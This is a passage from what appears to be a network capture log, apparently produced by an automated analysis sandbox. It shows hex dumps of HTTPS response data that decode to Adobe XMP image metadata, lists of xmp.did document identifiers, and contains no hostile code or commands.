2d 61 62 34 65 2d 61 61 32 63 2d 64 35 38 38 65 61 35 38 64 37 30 63 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>xmp.did:0c77f61b-a8f1-c44b-8e22-32f86791bec2</rdf:li> <rdf:li>xmp.did:0c89ffbf-b120-e544-a16f-29fc32bc4dc4</rdf:li> <rdf:li>xmp.did:0cb94417-0aad-491e-a8d9-747bcda3782a</rdf:li> <rdf:li>xmp.did:0ccf02d6-d67c-ab4e-aa2c-d588ea58d70c</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5638INData Raw: 33 62 33 35 35 63 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 61 31 37 38 64 65 39 2d 33 61 35 63 2d 32 66 34 32 2d 61 37 32 36 2d 38 30 30 32 37 32 62 36 34 63 63 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 61 64 66 61 65 64 65 2d 37 66 62 32 2d 34 35 39 35 2d 61 61 63 38 2d 64 31 63 33 38 34 35 65 36 64 39 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 62 32 39 62 39 66 64 2d 39 31 65 62 2d 66 66 34 38 2d 39 63 32 39 2d 38 33 65 32 35 63 30 64 30 64 31 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 62 34 63 61 30 35 32 2d 31 36 35 63 2d 34 31 65 39 2d 39 36 34 64 2d 38 38 37 38 32 65 31 64 33 38 30 65
                                                                                                                                                                                    Data Ascii: 3b355ca</rdf:li> <rdf:li>xmp.did:1a178de9-3a5c-2f42-a726-800272b64cca</rdf:li> <rdf:li>xmp.did:1adfaede-7fb2-4595-aac8-d1c3845e6d9a</rdf:li> <rdf:li>xmp.did:1b29b9fd-91eb-ff48-9c29-83e25c0d0d14</rdf:li> <rdf:li>xmp.did:1b4ca052-165c-41e9-964d-88782e1d380e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5653INData Raw: 30 45 43 30 41 37 44 39 41 33 38 46 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 38 46 44 30 32 43 37 43 30 35 45 31 31 31 38 41 38 42 42 34 42 31 32 41 43 34 32 37 39 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 39 35 43 45 41 37 31 35 32 30 36 38 31 31 38 32 32 41 43 45 43 45 46 36 43 43 30 38 37 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 41 38 38 42 31 34 43 42 32 39 45 36 31 31 38 41 41 39 43 36 36 35 34 35 35 34 44 43 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 42 30 43 35 44 41 46 31 32 30 36 38 31 31 42 44 34 43 46 34 46 39 43 30 31 45 39 38 32 41 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: 0EC0A7D9A38F3</rdf:li> <rdf:li>xmp.did:258FD02C7C05E1118A8BB4B12AC42799</rdf:li> <rdf:li>xmp.did:2595CEA715206811822ACECEF6CC087F</rdf:li> <rdf:li>xmp.did:25A88B14CB29E6118AA9C6654554DCCE</rdf:li> <rdf:li>xmp.did:25B0C5DAF1206811BD4CF4F9C01E982A</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5685INData Raw: 36 46 39 33 33 35 30 32 34 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 41 34 43 30 41 41 30 30 45 41 45 30 31 31 41 38 42 44 44 43 38 44 34 36 39 34 30 35 43 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 42 30 39 35 31 43 30 31 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 43 35 33 39 35 35 30 41 32 30 36 38 31 31 38 30 38 33 42 46 44 39 41 39 46 38 31 37 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 43 43 30 31 38 31 33 32 32 36 36 38 31 31 38 43 31 34 46 31 45 38 34 42 43 43 43 39 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: 6F9335024B2</rdf:li> <rdf:li>xmp.did:33A4C0AA00EAE011A8BDDC8D469405CB</rdf:li> <rdf:li>xmp.did:33B0951C01236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:33C539550A2068118083BFD9A9F81730</rdf:li> <rdf:li>xmp.did:33CC0181322668118C14F1E84BCCC9EA</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5717INData Raw: 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 31 32 39 33 34 43 34 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 31 34 34 30 43 42 32 31 35 32 30 36 38 31 31 38 30 38 33 39 31 46 38 39 43 38 33 45 41 32 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 31 34 38 46 33 31 32 37 45 32 30 36 38 31 31 38 30 38 33 43 37 45 39 41 42 30 44 33 33 32 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 31 34 43 46 34 35 43 33 32 46 41 45 30 31 31 41 39 35 37 39 45 31 33 39 43 36 45 37 36 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 31 34 61 64 32 34 31
                                                                                                                                                                                    Data Ascii: rdf:li>xmp.did:412934C40720681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:41440CB215206811808391F89C83EA2B</rdf:li> <rdf:li>xmp.did:4148F3127E2068118083C7E9AB0D332A</rdf:li> <rdf:li>xmp.did:414CF45C32FAE011A9579E139C6E7696</rdf:li> <rdf:li>xmp.did:414ad241
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5757INData Raw: 45 37 33 31 31 45 37 42 37 46 33 45 36 46 31 37 38 41 34 37 33 43 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 41 44 44 31 34 33 36 34 32 32 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 42 46 41 36 31 30 30 44 32 30 36 38 31 31 38 43 31 34 46 35 31 31 45 34 39 45 42 32 38 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 45 35 32 33 30 35 30 44 32 30 36 38 31 31 38 41 36 44 42 46 32 39 38 38 37 35 34 36 41 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 46 31 34 36 31 44 38 45 30 42 44 46 31 31 38 31 32 38 44 35 35 35 43 39 33 39 36 42 46 44
                                                                                                                                                                                    Data Ascii: E7311E7B7F3E6F178A473C1</rdf:li> <rdf:li>xmp.did:48ADD14364226811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:48BFA6100D2068118C14F511E49EB28A</rdf:li> <rdf:li>xmp.did:48E523050D2068118A6DBF29887546A7</rdf:li> <rdf:li>xmp.did:48F1461D8E0BDF118128D555C9396BFD
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5844INData Raw: 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 61 33 38 61 66 35 2d 39 39 37 38 2d 63 36 34 66 2d 38 35 65 30 2d 35 66 66 63 37 65 30 34 64 37 30 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 61 63 33 61 34 62 2d 61 32 61 32 2d 32 38 34 64 2d 62 38 38 36 2d 66 36 63 31 66 32 63 37 30 64 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 37 30 65 66 63 38 33 2d 66 39 63 31 2d 34 39 36 32 2d 38 33 39 64 2d 62 32 39 30 66 30 39 62 61 32 62 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 37 33 36 30 64 30 61 2d 39 39 32 35 2d 34 65 61 34 2d 61 66 64 35 2d 66 30 61 39 66 64 65 31 32 34 37 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70
                                                                                                                                                                                    Data Ascii: :li>xmp.did:56a38af5-9978-c64f-85e0-5ffc7e04d70f</rdf:li> <rdf:li>xmp.did:56ac3a4b-a2a2-284d-b886-f6c1f2c70d62</rdf:li> <rdf:li>xmp.did:570efc83-f9c1-4962-839d-b290f09ba2be</rdf:li> <rdf:li>xmp.did:57360d0a-9925-4ea4-afd5-f0a9fde1247f</rdf:li> <rdf:li>xmp
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5908INData Raw: 39 2d 65 61 33 31 31 34 32 35 32 63 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 35 38 45 33 43 41 32 35 32 30 36 38 31 31 39 32 42 30 42 37 38 35 43 34 31 34 44 38 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 36 42 38 32 30 45 33 34 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 36 45 41 36 36 43 34 35 45 46 31 31 45 31 41 41 31 31 45 41 31 44 34 38 32 46 31 44 34 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 36 37 43 34 44 32 43 36 41 37 43 45 30 31 31 42 35 43 35 41 44 35 37 35 32 36 34 33 41 35 38 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: 9-ea3114252c52</rdf:li> <rdf:li>xmp.did:6658E3CA2520681192B0B785C414D861</rdf:li> <rdf:li>xmp.did:666B820E34236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:666EA66C45EF11E1AA11EA1D482F1D4A</rdf:li> <rdf:li>xmp.did:667C4D2C6A7CE011B5C5AD5752643A58</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5932INData Raw: 36 44 45 34 35 34 35 42 32 30 36 38 31 31 38 32 32 41 46 44 41 35 36 35 38 46 31 31 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 45 42 34 37 46 45 32 31 33 32 30 36 38 31 31 38 44 42 42 38 41 46 46 43 44 45 42 31 32 36 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 45 42 39 37 46 30 41 45 31 32 30 36 38 31 31 41 46 46 44 44 44 35 36 43 46 43 35 36 39 30 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 45 43 38 46 33 38 43 46 43 34 33 31 31 45 31 42 39 41 31 44 35 36 37 33 41 35 36 43 35 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 45 44 45 30 44 42 41 30 37 32 30 36 38 31 31 38 30 38 33 38 32 45 31 35
                                                                                                                                                                                    Data Ascii: 6DE4545B206811822AFDA5658F115D</rdf:li> <rdf:li>xmp.did:6EB47FE2132068118DBB8AFFCDEB126E</rdf:li> <rdf:li>xmp.did:6EB97F0AE1206811AFFDDD56CFC56907</rdf:li> <rdf:li>xmp.did:6EC8F38CFC4311E1B9A1D5673A56C591</rdf:li> <rdf:li>xmp.did:6EDE0DBA07206811808382E15
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6027INData Raw: 64 3a 37 44 31 39 31 38 39 45 44 37 31 45 44 45 31 31 39 42 42 42 44 42 38 31 44 39 35 33 38 33 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 32 30 41 32 41 45 32 38 32 30 36 38 31 31 38 30 38 33 39 44 33 31 31 31 35 34 33 33 42 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 32 34 35 45 36 35 41 35 32 32 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 33 30 41 46 44 39 41 38 34 44 45 31 31 31 38 37 34 46 39 33 35 31 45 39 30 46 46 44 41 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 34 33 33 39 36 32 43 32 32 31 36 38 31 31 39 31 30 39 46
                                                                                                                                                                                    Data Ascii: d:7D19189ED71EDE119BBBDB81D953839E</rdf:li> <rdf:li>xmp.did:7D20A2AE2820681180839D31115433BD</rdf:li> <rdf:li>xmp.did:7D245E65A5226811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:7D30AFD9A84DE111874F9351E90FFDAB</rdf:li> <rdf:li>xmp.did:7D433962C22168119109F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6051INData Raw: 70 2e 64 69 64 3a 38 41 37 37 42 36 35 38 42 43 44 33 44 45 31 31 38 32 30 35 41 44 35 39 31 42 44 34 43 42 34 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 37 44 32 35 38 31 30 41 32 30 36 38 31 31 38 41 36 44 43 36 33 38 46 39 46 43 39 35 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 38 31 37 41 39 33 35 46 34 38 45 31 31 31 39 39 38 31 42 32 36 33 39 36 38 31 31 42 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 39 35 34 30 37 32 30 38 32 30 36 38 31 31 41 39 36 34 46 36 37 32 31 34 37 33 31 41 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 42 30 34 44 36 42 39 41 32 32 36 38 31 31 38
                                                                                                                                                                                    Data Ascii: p.did:8A77B658BCD3DE118205AD591BD4CB4E</rdf:li> <rdf:li>xmp.did:8A7D25810A2068118A6DC638F9FC95EE</rdf:li> <rdf:li>xmp.did:8A817A935F48E1119981B26396811B32</rdf:li> <rdf:li>xmp.did:8A95407208206811A964F67214731AFC</rdf:li> <rdf:li>xmp.did:8AB04D6B9A2268118
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6059INData Raw: 31 38 41 36 44 44 34 36 44 41 30 43 41 31 30 43 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 30 32 31 45 45 30 31 44 44 46 41 45 34 31 31 38 45 36 34 46 32 30 31 45 30 30 45 45 43 32 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 30 32 36 44 34 41 43 31 42 32 30 36 38 31 31 38 43 31 34 42 38 37 30 37 44 35 37 30 41 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 30 32 41 39 30 44 37 32 32 32 30 36 38 31 31 38 43 31 34 46 35 41 43 37 33 44 44 38 31 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 30 33 32 32 32 43 41 42 32 46 35 45 32 31 31 39 34 45 36 44 37 42 30 31 43 32 32 30 33 36 34 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: 18A6DD46DA0CA10CF</rdf:li> <rdf:li>xmp.did:9021EE01DDFAE4118E64F201E00EEC2A</rdf:li> <rdf:li>xmp.did:9026D4AC1B2068118C14B8707D570A5C</rdf:li> <rdf:li>xmp.did:902A90D7222068118C14F5AC73DD8129</rdf:li> <rdf:li>xmp.did:903222CAB2F5E21194E6D7B01C220364</rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6075INData Raw: 63 61 35 63 37 2d 39 66 37 36 2d 34 31 61 39 2d 39 30 33 38 2d 61 34 66 38 37 65 62 37 61 34 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 64 65 62 34 33 39 30 2d 62 66 61 63 2d 34 62 37 34 2d 61 34 39 35 2d 33 35 37 38 37 33 61 61 36 65 33 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 65 38 32 63 36 65 39 2d 34 65 33 33 2d 30 62 34 37 2d 61 37 61 30 2d 36 32 35 36 36 38 64 35 39 36 36 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 65 62 63 35 34 32 31 2d 64 32 38 38 2d 34 39 39 62 2d 38 31 66 61 2d 63 39 32 30 32 32 64 33 39 35 64 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 65 63 63 64 33 61 62 2d 33
                                                                                                                                                                                    Data Ascii: ca5c7-9f76-41a9-9038-a4f87eb7a486</rdf:li> <rdf:li>xmp.did:9deb4390-bfac-4b74-a495-357873aa6e3b</rdf:li> <rdf:li>xmp.did:9e82c6e9-4e33-0b47-a7a0-625668d5966d</rdf:li> <rdf:li>xmp.did:9ebc5421-d288-499b-81fa-c92022d395db</rdf:li> <rdf:li>xmp.did:9eccd3ab-3
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6091INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 36 36 42 31 34 33 32 37 36 36 34 45 30 31 31 42 45 34 31 42 31 35 41 36 41 30 32 39 39 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 36 38 33 38 31 43 45 30 39 32 37 44 46 31 31 38 38 38 44 44 45 32 41 36 37 41 41 38 32 38 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 36 38 38 30 42 41 31 41 44 32 30 36 38 31 31 38 32 44 34 43 45 42 42 36 42 31 30 43 37 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 36 39 31 46 43 31 38 35 35 32 30 36 38 31 31 39 42 34 37 38 38 43 32 30 42 38 44 35 37 34 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 36
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>xmp.did:B66B14327664E011BE41B15A6A029915</rdf:li> <rdf:li>xmp.did:B68381CE0927DF11888DDE2A67AA828E</rdf:li> <rdf:li>xmp.did:B6880BA1AD20681182D4CEBB6B10C7C6</rdf:li> <rdf:li>xmp.did:B691FC18552068119B4788C20B8D5749</rdf:li> <rdf:li>xmp.did:B6
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6095INData Raw: 32 30 36 38 31 31 38 46 36 32 45 31 35 32 30 45 42 46 32 34 30 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 43 33 36 38 32 36 36 39 30 31 41 45 32 31 31 38 37 36 31 45 38 45 46 42 33 36 37 44 39 36 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 43 33 41 44 34 45 41 30 37 32 30 36 38 31 31 38 30 38 33 46 34 43 31 44 33 42 37 32 32 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 43 34 42 31 33 34 35 33 45 32 33 36 38 31 31 41 39 46 42 46 39 34 36 33 33 34 30 44 39 44 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 43 35 36 37 37 41 41 39 30 32 30 36 38 31 31 38 30 38 33 41 32 42 36 43 32 38 33 31 33 43 41 3c
                                                                                                                                                                                    Data Ascii: 2068118F62E1520EBF2401</rdf:li> <rdf:li>xmp.did:BC368266901AE2118761E8EFB367D965</rdf:li> <rdf:li>xmp.did:BC3AD4EA072068118083F4C1D3B72213</rdf:li> <rdf:li>xmp.did:BC4B13453E236811A9FBF9463340D9D1</rdf:li> <rdf:li>xmp.did:BC5677AA902068118083A2B6C28313CA<
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6111INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 32 36 32 33 33 37 36 30 37 32 30 36 38 31 31 38 32 32 41 39 37 46 36 45 39 36 37 34 46 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 32 37 33 44 34 30 32 30 42 32 30 36 38 31 31 38 30 38 33 38 43 33 30 35 44 43 41 39 45 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 32 37 46 31 31 37 34 30 37 32 30 36 38 31 31 42 35 34 36 46 42 35 42 31 34 35 41 35 37 42 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 32 38 35 42 34 44 39 45 36 31 37 45 30 31 31 41 41 38 37 45 41 37 31 39 35 42 41 36 44 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 32 38
                                                                                                                                                                                    Data Ascii: li> <rdf:li>xmp.did:D262337607206811822A97F6E9674F87</rdf:li> <rdf:li>xmp.did:D273D4020B20681180838C305DCA9E89</rdf:li> <rdf:li>xmp.did:D27F117407206811B546FB5B145A57BC</rdf:li> <rdf:li>xmp.did:D285B4D9E617E011AA87EA7195BA6DFB</rdf:li> <rdf:li>xmp.did:D28
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6127INData Raw: 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 37 36 30 34 33 41 46 32 35 32 30 36 38 31 31 38 36 44 33 41 34 38 39 34 45 33 41 32 46 41 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 37 37 31 44 31 33 35 38 35 32 32 36 38 31 31 38 44 42 42 45 45 41 33 41 35 32 33 44 43 37 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 37 38 33 36 44 42 43 46 37 42 41 45 31 31 31 38 45 32 32 42 32 44 34 42 39 43 30 36 44 35 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 37 44 33 36 39 34 34 33 32 32 30 36 38 31 31 38 30 38 33 45 36 44 38 33 31 32 42 31 38 39 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 37 44 39 45 43 36 38 35 44
                                                                                                                                                                                    Data Ascii: f:li>xmp.did:E76043AF2520681186D3A4894E3A2FA7</rdf:li> <rdf:li>xmp.did:E771D135852268118DBBEEA3A523DC7B</rdf:li> <rdf:li>xmp.did:E7836DBCF7BAE1118E22B2D4B9C06D59</rdf:li> <rdf:li>xmp.did:E7D36944322068118083E6D8312B1897</rdf:li> <rdf:li>xmp.did:E7D9EC685D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC6134INData Raw: 31 31 41 35 44 41 45 33 34 33 31 44 35 42 35 43 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 34 36 46 39 37 43 31 34 32 30 36 38 31 31 39 31 30 39 42 36 44 42 34 38 45 39 31 38 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 35 37 34 43 34 38 46 42 34 30 45 30 31 31 42 44 43 44 41 36 44 37 45 33 44 44 46 42 39 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 36 35 32 46 42 43 44 38 32 34 36 38 31 31 39 35 46 45 46 31 37 37 45 35 34 44 38 38 39 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 33 38 33 38 31 39 35 33 44 32 30 45 31 31 31 41 32 43 39 38 43 30 31 38 46 35 32 41 38 39 39 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: 11A5DAE3431D5B5C13</rdf:li> <rdf:li>xmp.did:F346F97C142068119109B6DB48E91803</rdf:li> <rdf:li>xmp.did:F3574C48FB40E011BDCDA6D7E3DDFB97</rdf:li> <rdf:li>xmp.did:F3652FBCD824681195FEF177E54D889B</rdf:li> <rdf:li>xmp.did:F38381953D20E111A2C98C018F52A899</rdf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6150INData Raw: 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 39 44 44 30 42 35 35 37 39 43 30 43 45 32 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 39 45 34 32 46 38 41 31 32 44 36 46 33 36 37 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 31 31 42 42 37 45 30 30 46 30 45 35 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 31 41 37 44 31 39 42 46 41 38 31 35 33 42 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37
                                                                                                                                                                                    Data Ascii: <rdf:li>xmp.did:FA7F1174072068119DD0B5579C0CE2FB</rdf:li> <rdf:li>xmp.did:FA7F1174072068119E42F8A12D6F367C</rdf:li> <rdf:li>xmp.did:FA7F117407206811A11BB7E00F0E5F6B</rdf:li> <rdf:li>xmp.did:FA7F117407206811A1A7D19BFA8153BA</rdf:li> <rdf:li>xmp.did:FA7F117
